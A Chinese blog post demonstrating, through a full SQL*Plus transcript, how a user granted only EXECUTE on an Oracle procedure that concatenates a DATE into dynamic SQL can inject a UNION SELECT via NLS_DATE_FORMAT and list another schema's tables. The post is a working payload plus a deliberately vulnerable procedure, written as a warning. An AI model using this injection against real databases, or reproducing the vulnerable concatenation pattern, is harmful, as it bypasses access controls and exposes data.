ANBOB™

今天看tom的有提到一个很有趣的东东，只授权的procedure execute，别人就可以sql注入，以后你可得小心了，下面请看我的试验

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE    10.2.0.4.0      Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME                          USER_ID CREATED
------------------------------ ---------- -------------------
ZYY                                  1099 2011-08-30 11:41:03
GZPX_DB                              1070 2011-08-30 11:41:01
GIAF                                 1069 2011-08-30 11:41:01
DEAN_TRAIN                           1068 2011-08-30 11:41:01
...

75 rows selected.

SQL> select * from tab;

TNAME                          TABTYPE  CLUSTERID
------------------------------ ------- ----------
TEST                           TABLE
TESTA                          TABLE
TESTB                          TABLE
TESTBLOB                       TABLE
TESTC                          TABLE
TESTIMG                        TABLE
TESTKDR                        TABLE
TESTXY                         TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )
  2  as
  3  l_rec   all_users%rowtype;
  4  c       sys_refcursor;
  5  l_query long;
  6  begin
  7  l_query := 'select * from all_users where created = ''' ||p_date ||'''';
  8  dbms_output.put_line( l_query );
  9  open c for l_query;
 10  for i in 1 .. 10
 11  loop
 12  fetch c into l_rec;
 13  exit when c%notfound;
 14  dbms_output.put_line( l_rec.username || '.....' );
 15  end loop;
 16  close c;
 17  end;
 18  /

Procedure created.

SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme
Connected.
SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....

PL/SQL procedure successfully completed.

呵，是不是很眼熟，这当然是anbob的表，这些表并没有授权给icme。同样也可以从all_column得到列，那样就可以得到表只的一部份数据了...

打赏

微信扫一扫，打赏作者吧～